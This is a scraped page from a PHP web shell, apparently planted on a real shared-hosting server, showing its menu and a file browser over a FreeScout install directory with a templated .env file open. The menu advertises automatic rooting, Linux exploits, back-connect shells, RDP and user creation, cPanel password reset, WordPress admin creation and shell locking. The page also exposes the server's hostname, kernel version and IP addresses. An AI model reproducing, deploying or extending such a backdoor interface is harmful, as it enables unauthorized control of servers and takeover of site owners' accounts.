Linux host45.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.116.152 | : 216.73.216.48
Cant Read [ /etc/named.conf ]
8.1.32
bankpromax
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
freescout /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.env
922
B
-rw-r--r--
.installed
59
B
-rw-r--r--
clone.php
11.01
KB
-rw-r--r--
config.php
34.72
KB
-rw-r--r--
edit.php
4.26
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
extend.php
10.04
KB
-rw-r--r--
fileindex.php
336
B
-rw-r--r--
freescout.sql
27.1
KB
-rw-r--r--
freescout.zip
9.86
MB
-rw-r--r--
import.php
3.14
KB
-rw-r--r--
info.xml
2.7
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.83
KB
-rw-r--r--
install.xml
1.87
KB
-rw-r--r--
md5
4.04
KB
-rw-r--r--
notes.txt
503
B
-rw-r--r--
update_pass.php
518
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .env
# Every time you are making changes in .env file, in order changes to take an effect you need to run: # php artisan freescout:clear-cache # Application URL APP_URL=[[softurl]] # Improve security SESSION_SECURE_COOKIE=[[SESSION_SECURE_COOKIE]] # Timezones: https://github.com/freescout-helpdesk/freescout/wiki/PHP-Timezones # Comment it to use default timezone from php.ini APP_TIMEZONE=America/New_York # Default language APP_LOCALE=[[language]] # Database settings DB_CONNECTION=mysql DB_HOST=[[softdbhost]] DB_PORT=3306 DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD="[[softdbpass]]" # Run the following console command to generate the key: php artisan key:generate # Otherwise application will show the following error: "Whoops, looks like something went wrong" APP_KEY=[[APP_KEY]] # Uncomment to see errors in your browser, don't forget to comment it back when debugging finished #APP_DEBUG=true
Close